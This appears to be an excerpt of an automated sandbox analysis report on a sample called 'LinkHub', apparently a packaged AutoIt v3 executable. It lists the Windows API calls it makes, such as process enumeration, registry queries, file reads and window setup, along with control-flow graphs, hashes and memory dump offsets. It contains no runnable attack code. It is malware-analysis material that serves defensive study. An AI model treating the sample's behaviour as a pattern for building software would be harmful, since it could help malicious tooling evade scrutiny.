                                                                                        • Instruction ID: d15156df4eb07e4732490fb64dcea027c8ce37349a1d58584797dcbc24ae040b
                                                                                        • Opcode Fuzzy Hash: 16d29208b96f05c7ab15de17b19f1ab14310fc7e32a64d87837c034b0fac2848
                                                                                        • Instruction Fuzzy Hash: B851F170528341EEC716EF60ED09DAE7BB8AFA5744F00052EF581561E3CB608A6DDB62
                                                                                        APIs
                                                                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 0026DDAC
                                                                                        • Process32FirstW.KERNEL32(00000000,?), ref: 0026DDBA
                                                                                        • Process32NextW.KERNEL32(00000000,?), ref: 0026DDDA
                                                                                        • CloseHandle.KERNELBASE(00000000), ref: 0026DE87
                                                                                        Similarity
                                                                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                        • String ID:
                                                                                        • API String ID: 420147892-0
                                                                                        • Opcode ID: e69f51040576aea5bc98e54a6bbdd131d9995bbf72551904e17faba068236e17
                                                                                        • Instruction ID: 929da2ec6de936b1a97d6052f8ea49267138909e1bf9e3950c07f81a8b65c2e0
                                                                                        • Opcode Fuzzy Hash: e69f51040576aea5bc98e54a6bbdd131d9995bbf72551904e17faba068236e17
                                                                                        • Instruction Fuzzy Hash: 6C31D4725183019FC311EF50DC85AAFBBE8EF99340F10092DF585871A2DB729995CF92
                                                                                        APIs
                                                                                        • GetCurrentProcess.KERNEL32(00000003,?,0022502E,00000003,002C98D8,0000000C,00225185,00000003,00000002,00000000,?,00232C59,00000003), ref: 00225079
                                                                                        • TerminateProcess.KERNEL32(00000000,?,0022502E,00000003,002C98D8,0000000C,00225185,00000003,00000002,00000000,?,00232C59,00000003), ref: 00225080
                                                                                        • ExitProcess.KERNEL32 ref: 00225092
                                                                                        Similarity
                                                                                        • API ID: Process$CurrentExitTerminate
                                                                                        • String ID:
                                                                                        • API String ID: 1703294689-0
                                                                                        • Opcode ID: 4cfb803fd5a347e33007708cb062ea84775ccbee428a891d13ddfc431a9550eb
                                                                                        • Instruction ID: 30ee21f8a16283566b9aa49c79ca7d223180dae4d2cb663bec827168eeb4bf4c
                                                                                        • Opcode Fuzzy Hash: 4cfb803fd5a347e33007708cb062ea84775ccbee428a891d13ddfc431a9550eb
                                                                                        • Instruction Fuzzy Hash: C3E04632010528AFCF216FA0ED0CE483B69EB14382F008014F8098A121DB3ADE62DEC0

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 4)$@)$P)$`*-$`)$d0b$d10m0$d1b$d1r0,2$d5m0$e#-$i$t)$t)$(-$(-$(-$(-$)$)
                                                                                        • API String ID: 0-4211438255
                                                                                        • Opcode ID: 475a7e461b40839ccf66c6aecb99e8f25679317496fc2d51fb7bc68569c4a1a8
                                                                                        • Instruction ID: f8663a517c51ce60816e8d9153365ec51c3e76f18c6dd3381fef9a0bfd20b1b0
                                                                                        • Opcode Fuzzy Hash: 475a7e461b40839ccf66c6aecb99e8f25679317496fc2d51fb7bc68569c4a1a8
                                                                                        • Instruction Fuzzy Hash: A8625874528341DFC725CF14C094AAABBE1FF98304F10895EE8899B352DBB1D999CF92

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 00203657
                                                                                        • RegisterClassExW.USER32(00000030), ref: 00203681
                                                                                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00203692
                                                                                        • InitCommonControlsEx.COMCTL32(?), ref: 002036AF
                                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 002036BF
                                                                                        • LoadIconW.USER32(000000A9), ref: 002036D5
                                                                                        • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 002036E4
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                        • String ID: +$0$0+m" $AutoIt v3 GUI$TaskbarCreated
                                                                                        • API String ID: 2914291525-3995681352
                                                                                        • Opcode ID: 96f77cee26cc94e644cc8163b5dccb099bf445400262e999eecb80cfa10fda2a
                                                                                        • Instruction ID: c6d1065346aa3aa471ce7a0e70674e6a6bd3e11cbabbf8bd43bed7f11b2d5875
                                                                                        • Opcode Fuzzy Hash: 96f77cee26cc94e644cc8163b5dccb099bf445400262e999eecb80cfa10fda2a
                                                                                        • Instruction Fuzzy Hash: B721BFB5D12218EFDB009FA4F98DBDDBBB4FB18710F10411BEA11A62A0D7B549589F90

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 356 20370f-203724 357 203784-203786 356->357 358 203726-203729 356->358 357->358 359 203788 357->359 360 20378a 358->360 361 20372b-203732 358->361 362 20376f-203777 DefWindowProcW 359->362 363 243df4-243e1c call 202f92 call 21f23c 360->363 364 203790-203795 360->364 365 203804-20380c PostQuitMessage 361->365 366 203738-20373d 361->366 367 20377d-203783 362->367 402 243e21-243e28 363->402 369 203797-20379a 364->369 370 2037bc-2037e3 SetTimer RegisterWindowMessageW 364->370 368 2037b8-2037ba 365->368 371 203743-203747 366->371 372 243e61-243e75 call 26c8f7 366->372 368->367 374 2037a0-2037b3 KillTimer call 203907 call 2059ff 369->374 375 243d95-243d98 369->375 370->368 376 2037e5-2037f0 CreatePopupMenu 370->376 377 20374d-203752 371->377 378 20380e-20381d call 21fcad 371->378 372->368 397 243e7b 372->397 374->368 382 243dd0-243def MoveWindow 375->382 383 243d9a-243d9e 375->383 376->368 385 243e46-243e4d 377->385 386 203758-20375d 377->386 378->368 382->368 391 243da0-243da3 383->391 392 243dbf-243dcb SetFocus 383->392 385->362 394 243e53-243e5c call 261423 385->394 395 2037f2-203802 call 20381f 386->395 396 203763-203769 386->396 391->396 398 243da9-243dba call 202f92 391->398 392->368 394->362 395->368 396->362 396->402 397->362 398->368 402->362 403 243e2e-243e41 call 203907 call 20396b 402->403 403->362
                                                                                        APIs
                                                                                        • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00203709,?,?), ref: 00203777
                                                                                        • KillTimer.USER32(?,00000001,?,?,?,?,?,00203709,?,?), ref: 002037A3
                                                                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 002037C6
                                                                                        • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00203709,?,?), ref: 002037D1
                                                                                        • CreatePopupMenu.USER32 ref: 002037E5
                                                                                        • PostQuitMessage.USER32(00000000), ref: 00203806
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                        • String ID: 0$-$0$-$TaskbarCreated
                                                                                        • API String ID: 129472671-12809645
                                                                                        • Opcode ID: 215facbae750b2cd717c99f4e1e85f46d89c2494d4b34f863720303277408076
                                                                                        • Instruction ID: 6f08e656a4e4a0207af9be46fad3ee70338141e6b4cb3ac3cb44869052b6eeb5
                                                                                        • Opcode Fuzzy Hash: 215facbae750b2cd717c99f4e1e85f46d89c2494d4b34f863720303277408076
                                                                                        • Instruction Fuzzy Hash: 1A41C3B1630346FADB14AF68AD5DBA9BA6DEB14300F104126F501862E2CAA49E789661

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 412 2409db-240a0b call 2407af 415 240a26-240a32 call 235594 412->415 416 240a0d-240a18 call 22f636 412->416 422 240a34-240a49 call 22f636 call 22f649 415->422 423 240a4b-240a94 call 24071a 415->423 421 240a1a-240a21 call 22f649 416->421 432 240cfd-240d03 421->432 422->421 430 240a96-240a9f 423->430 431 240b01-240b0a GetFileType 423->431 435 240ad6-240afc GetLastError call 22f613 430->435 436 240aa1-240aa5 430->436 437 240b53-240b56 431->437 438 240b0c-240b3d GetLastError call 22f613 CloseHandle 431->438 435->421 436->435 441 240aa7-240ad4 call 24071a 436->441 439 240b5f-240b65 437->439 440 240b58-240b5d 437->440 438->421 449 240b43-240b4e call 22f649 438->449 444 240b69-240bb7 call 2354dd 439->444 445 240b67 439->445 440->444 441->431 441->435 455 240bc7-240beb call 2404cd 444->455 456 240bb9-240bc5 call 24092b 444->456 445->444 449->421 461 240bed 455->461 462 240bfe-240c41 455->462 456->455 463 240bef-240bf9 call 238a2e 456->463 461->463 465 240c62-240c70 462->465 466 240c43-240c47 462->466 463->432 469 240c76-240c7a 465->469 470 240cfb 465->470 466->465 468 240c49-240c5d 466->468 468->465 469->470 471 240c7c-240caf CloseHandle call 24071a 469->471 470->432 474 240cb1-240cdd GetLastError call 22f613 call 2356a6 471->474 475 240ce3-240cf7 471->475 474->475 475->470
                                                                                        APIs
                                                                                          • Part of subcall function 0024071A: CreateFileW.KERNELBASE(00000000,00000000,?,00240A84,?,?,00000000,?,00240A84,00000000,0000000C), ref: 00240737
                                                                                        • GetLastError.KERNEL32 ref: 00240AEF
                                                                                        • __dosmaperr.LIBCMT ref: 00240AF6
                                                                                        • GetFileType.KERNELBASE(00000000), ref: 00240B02
                                                                                        • GetLastError.KERNEL32 ref: 00240B0C
                                                                                        • __dosmaperr.LIBCMT ref: 00240B15
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00240B35
                                                                                        • CloseHandle.KERNEL32(?), ref: 00240C7F
                                                                                        • GetLastError.KERNEL32 ref: 00240CB1
                                                                                        • __dosmaperr.LIBCMT ref: 00240CB8
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                        • String ID: H
                                                                                        • API String ID: 4237864984-2852464175
                                                                                        • Opcode ID: f049a269961d7642ef06d23c64a3943eb293f87d8090b98d0e0074895b045677
                                                                                        • Instruction ID: be8e31191bfe6140f4535479a24e76abab3022a4597f2dd153ecca145faf3282
                                                                                        • Opcode Fuzzy Hash: f049a269961d7642ef06d23c64a3943eb293f87d8090b98d0e0074895b045677
                                                                                        • Instruction Fuzzy Hash: D9A13632A202159FCF1DAF68E896BAD7BA0EB06324F14015AF911DF3D1C7359C62CB51

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                          • Part of subcall function 00205594: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00244B76,?,?,00000100,00000000,00000000,CMDLINE,?,?,00000001,00000000), ref: 002055B2
                                                                                          • Part of subcall function 00205238: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0020525A
                                                                                        • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 002053C4
                                                                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00244BFD
                                                                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00244C3E
                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00244C80
                                                                                        • _wcslen.LIBCMT ref: 00244CE7
                                                                                        • _wcslen.LIBCMT ref: 00244CF6
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                                                                        • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                        • API String ID: 98802146-2727554177
                                                                                        • Opcode ID: 1637516584af24e4dc586371db0436c5491704ba5c3d2ebff7a392bbe8fef63c
                                                                                        • Instruction ID: 5a2baa696e0ae9882ee0de39b0a56ad88f925730540f834b9d589d8b5cd2987c
                                                                                        • Opcode Fuzzy Hash: 1637516584af24e4dc586371db0436c5491704ba5c3d2ebff7a392bbe8fef63c
                                                                                        • Instruction Fuzzy Hash: 6F719E71925301AFC714EF69ED8999BBBE8FF48340F80046EF441931A1DB719A68CF92

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 002034DE
                                                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 002034ED
                                                                                        • LoadIconW.USER32(00000063), ref: 00203503
                                                                                        • LoadIconW.USER32(000000A4), ref: 00203515
                                                                                        • LoadIconW.USER32(000000A2), ref: 00203527
                                                                                        • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 0020353F
                                                                                        • RegisterClassExW.USER32(?), ref: 00203590
                                                                                          • Part of subcall function 00203624: GetSysColorBrush.USER32(0000000F), ref: 00203657
                                                                                          • Part of subcall function 00203624: RegisterClassExW.USER32(00000030), ref: 00203681
                                                                                          • Part of subcall function 00203624: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00203692
                                                                                          • Part of subcall function 00203624: InitCommonControlsEx.COMCTL32(?), ref: 002036AF
                                                                                          • Part of subcall function 00203624: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 002036BF
                                                                                          • Part of subcall function 00203624: LoadIconW.USER32(000000A9), ref: 002036D5
                                                                                          • Part of subcall function 00203624: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 002036E4
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                        • String ID: #$0$AutoIt v3
                                                                                        • API String ID: 423443420-4155596026
                                                                                        • Opcode ID: 1c5a5265468c46d301d2ec5823cd9534bc039a747c65ad519bf1a5dd79f02943
                                                                                        • Instruction ID: 0d120726da58bce75c2f76506355e1d686bf524389f8b3a9fdc5f405ecfb695d
                                                                                        • Opcode Fuzzy Hash: 1c5a5265468c46d301d2ec5823cd9534bc039a747c65ad519bf1a5dd79f02943
                                                                                        • Instruction Fuzzy Hash: 02214970D11318EBDB509FA5FC4DBAABFB8FB18B50F00015BE604A62A0C7B90958DF94
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: Variable must be of type 'Object'.$t5-$t5-$t5-$t5-$t5-t5-
                                                                                        • API String ID: 0-683389354
                                                                                        • Opcode ID: 1f63e93fd29c90b3eef1496eca6634fddd56a16e98879ff14722e3241a706daf
                                                                                        • Instruction ID: 4d4f5831580b0e9f50ab2d339149cbaea7151d8037b50ffe4a72c12c35b7abdf
                                                                                        • Opcode Fuzzy Hash: 1f63e93fd29c90b3eef1496eca6634fddd56a16e98879ff14722e3241a706daf
                                                                                        • Instruction Fuzzy Hash: 84C2AF71E60215DFCB20DF58D980AADB7F1BF08304F24816AE905AB792D375ADA1CF91

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1063 202ab0-202ae9 1064 243a1a-243a1b DestroyWindow 1063->1064 1065 202aef-202b05 mciSendStringW 1063->1065 1068 243a26-243a33 1064->1068 1066 202d66-202d73 1065->1066 1067 202b0b-202b13 1065->1067 1070 202d75-202d90 UnregisterHotKey 1066->1070 1071 202d98-202d9f 1066->1071 1067->1068 1069 202b19-202b28 call 202ede 1067->1069 1073 243a35-243a38 1068->1073 1074 243a62-243a69 1068->1074 1084 243a70-243a7c 1069->1084 1085 202b2e-202b36 1069->1085 1070->1071 1076 202d92-202d93 call 202770 1070->1076 1071->1067 1072 202da5 1071->1072 1072->1066 1079 243a44-243a47 FindClose 1073->1079 1080 243a3a-243a42 call 207aab 1073->1080 1074->1068 1078 243a6b 1074->1078 1076->1071 1078->1084 1083 243a4d-243a5a 1079->1083 1080->1083 1083->1074 1086 243a5c-243a5d call 273cf6 1083->1086 1089 243a86-243a8d 1084->1089 1090 243a7e-243a80 FreeLibrary 1084->1090 1087 243a94-243aa1 1085->1087 1088 202b3c-202b61 call 20e6a0 1085->1088 1086->1074 1095 243aa3-243ac0 VirtualFree 1087->1095 1096 243ac8-243acf 1087->1096 1100 202b63 1088->1100 1101 202b98-202ba3 CoUninitialize 1088->1101 1089->1084 1094 243a8f 1089->1094 1090->1089 1094->1087 1095->1096 1098 243ac2-243ac3 call 273d5c 1095->1098 1096->1087 1099 243ad1 1096->1099 1098->1096 1103 243ad6-243ada 1099->1103 1104 202b66-202b96 call 2030c0 call 203069 1100->1104 1101->1103 1105 202ba9-202bae 1101->1105 1103->1105 1106 243ae0-243ae4 call 270b4c 1103->1106 1104->1101 1108 202bb4-202bbe 1105->1108 1109 243aeb-243af8 call 273d30 1105->1109 1114 243ae6 1106->1114 1112 202bc4-202c45 call 20bd98 call 202ff4 call 202e85 call 220184 call 202e1c call 20bd98 call 20e6a0 call 202eae call 220184 1108->1112 1113 202da7-202db4 call 21fb19 1108->1113 1121 243afa 1109->1121 1126 243aff-243b21 call 22013d 1112->1126 1153 202c4b-202c6f call 220184 1112->1153 1113->1112 1123 202dba 1113->1123 1114->1105 1121->1126 1123->1113 1132 243b23 1126->1132 1135 243b28-243b4a call 22013d 1132->1135 1140 243b4c 1135->1140 1143 243b51-243b73 call 22013d 1140->1143 1149 243b75 1143->1149 1152 243b7a-243b87 call 266e3b 1149->1152 1159 243b89 1152->1159 1153->1135 1158 202c75-202c99 call 220184 1153->1158 1158->1143 1163 202c9f-202cb9 call 220184 1158->1163 1162 243b8e-243b9b call 21bdf0 1159->1162 1167 243b9d 1162->1167 1163->1152 1169 202cbf-202ce3 call 202e85 call 220184 1163->1169 1170 243ba2-243baf call 273c8a 1167->1170 1169->1162 1178 202ce9-202cf1 1169->1178 1176 243bb1 1170->1176 1179 243bb6-243bc3 call 273d11 1176->1179 1178->1170 1180 202cf7-202d15 call 20bd98 call 202fba 1178->1180 1186 243bc5 1179->1186 1180->1179 1188 202d1b-202d29 1180->1188 1189 243bca-243bd7 call 273d11 1186->1189 1188->1189 1190 202d2f-202d65 call 20bd98 * 3 call 202f26 1188->1190 1194 243bd9 1189->1194 1194->1194
                                                                                        APIs
                                                                                        • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00202AF9
                                                                                        • CoUninitialize.COMBASE ref: 00202B98
                                                                                        • UnregisterHotKey.USER32(?), ref: 00202D7D
                                                                                        • DestroyWindow.USER32(?), ref: 00243A1B
                                                                                        • FreeLibrary.KERNEL32(?), ref: 00243A80
                                                                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00243AAD
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                        • String ID: close all
                                                                                        • API String ID: 469580280-3243417748
                                                                                        • Opcode ID: 5c5666663763a536cfdfafdf8b2e807a30cc520bd02cf0a21b89a735f506aecd
                                                                                        • Instruction ID: 8813d36959cbdf12567fdcf4a4e66faea05e3eddf6955982a2a64b2e0566a436
                                                                                        • Opcode Fuzzy Hash: 5c5666663763a536cfdfafdf8b2e807a30cc520bd02cf0a21b89a735f506aecd
                                                                                        • Instruction Fuzzy Hash: DDD15D31721222DFDB29EF14D489B69F7A4BF04714F1542AEE44A6B292CB31AD36CF40

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                          • Part of subcall function 0020327E: MapVirtualKeyW.USER32(0000005B,00000000), ref: 002032AF
                                                                                          • Part of subcall function 0020327E: MapVirtualKeyW.USER32(00000010,00000000), ref: 002032B7
                                                                                          • Part of subcall function 0020327E: MapVirtualKeyW.USER32(000000A0,00000000), ref: 002032C2
                                                                                          • Part of subcall function 0020327E: MapVirtualKeyW.USER32(000000A1,00000000), ref: 002032CD
                                                                                          • Part of subcall function 0020327E: MapVirtualKeyW.USER32(00000011,00000000), ref: 002032D5
                                                                                          • Part of subcall function 0020327E: MapVirtualKeyW.USER32(00000012,00000000), ref: 002032DD
                                                                                          • Part of subcall function 00203205: RegisterWindowMessageW.USER32(00000004,?,00202964), ref: 0020325D
                                                                                        • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00202A0A
                                                                                        • OleInitialize.OLE32 ref: 00202A28
                                                                                        • CloseHandle.KERNELBASE(00000000,00000000), ref: 00243A0D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                        • String ID: (&-$0$-$4'-$d(-$$-
                                                                                        • API String ID: 1986988660-1608988187
                                                                                        • Opcode ID: 46aca61079195ae7955c991e174218d2fb290d9c6181c1713533f93aa5225ced
                                                                                        • Instruction ID: 19d4e849fdeca79761dcbda2a69ad7317d79f1112e9dcfe14e84bc19286c7100
                                                                                        • Opcode Fuzzy Hash: 46aca61079195ae7955c991e174218d2fb290d9c6181c1713533f93aa5225ced
                                                                                        • Instruction Fuzzy Hash: 85717EB0D22341CED799EF69B96DA157BE4FB68304390416BE408C73A2EB704C5DAF64

                                                                                        Control-flow Graph

                                                                                        control_flow_graph 1246 2390c5-2390d5 1247 2390d7-2390ea call 22f636 call 22f649 1246->1247 1248 2390ef-2390f1 1246->1248 1264 239471 1247->1264 1250 2390f7-2390fd 1248->1250 1251 239459-239466 call 22f636 call 22f649 1248->1251 1250->1251 1254 239103-23912e 1250->1254 1269 23946c call 232b5c 1251->1269 1254->1251 1257 239134-23913d 1254->1257 1260 239157-239159 1257->1260 1261 23913f-239152 call 22f636 call 22f649 1257->1261 1262 239455-239457 1260->1262 1263 23915f-239163 1260->1263 1261->1269 1268 239474-239479 1262->1268 1263->1262 1267 239169-23916d 1263->1267 1264->1268 1267->1261 1271 23916f-239186 1267->1271 1269->1264 1274 2391a3-2391ac 1271->1274 1275 239188-23918b 1271->1275 1279 2391ca-2391d4 1274->1279 1280 2391ae-2391c5 call 22f636 call 22f649 call 232b5c 1274->1280 1277 239195-23919e 1275->1277 1278 23918d-239193 1275->1278 1281 23923f-239259 1277->1281 1278->1277 1278->1280 1283 2391d6-2391d8 1279->1283 1284 2391db-2391f9 call 233b93 call 232d38 * 2 1279->1284 1312 23938c 1280->1312 1285 23925f-23926f 1281->1285 1286 23932d-239336 call 23fc1b 1281->1286 1283->1284 1315 239216-23923c call 2397a4 1284->1315 1316 2391fb-239211 call 22f649 call 22f636 1284->1316 1285->1286 1289 239275-239277 1285->1289 1299 2393a9 1286->1299 1300 239338-23934a 1286->1300 1289->1286 1293 23927d-2392a3 1289->1293 1293->1286 1297 2392a9-2392bc 1293->1297 1297->1286 1302 2392be-2392c0 1297->1302 1304 2393ad-2393c5 ReadFile 1299->1304 1300->1299 1305 23934c-23935b GetConsoleMode 1300->1305 1302->1286 1307 2392c2-2392ed 1302->1307 1309 239421-23942c GetLastError 1304->1309 1310 2393c7-2393cd 1304->1310 1305->1299 1311 23935d-239361 1305->1311 1307->1286 1314 2392ef-239302 1307->1314 1317 239445-239448 1309->1317 1318 23942e-239440 call 22f649 call 22f636 1309->1318 1310->1309 1319 2393cf 1310->1319 1311->1304 1320 239363-23937d ReadConsoleW 1311->1320 1313 23938f-239399 call 232d38 1312->1313 1313->1268 1314->1286 1326 239304-239306 1314->1326 1315->1281 1316->1312 1323 239385-23938b call 22f613 1317->1323 1324 23944e-239450 1317->1324 1318->1312 1330 2393d2-2393e4 1319->1330 1321 23937f GetLastError 1320->1321 1322 23939e-2393a7 1320->1322 1321->1323 1322->1330 1323->1312 1324->1313 1326->1286 1333 239308-239328 1326->1333 1330->1313 1337 2393e6-2393ea 1330->1337 1333->1286 1341 239403-23940e 1337->1341 1342 2393ec-2393fc call 238de1 1337->1342 1344 239410 call 238f31 1341->1344 1345 23941a-23941f call 238c21 1341->1345 1351 2393ff-239401 1342->1351 1352 239415-239418 1344->1352 1345->1352 1351->1313 1352->1351
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
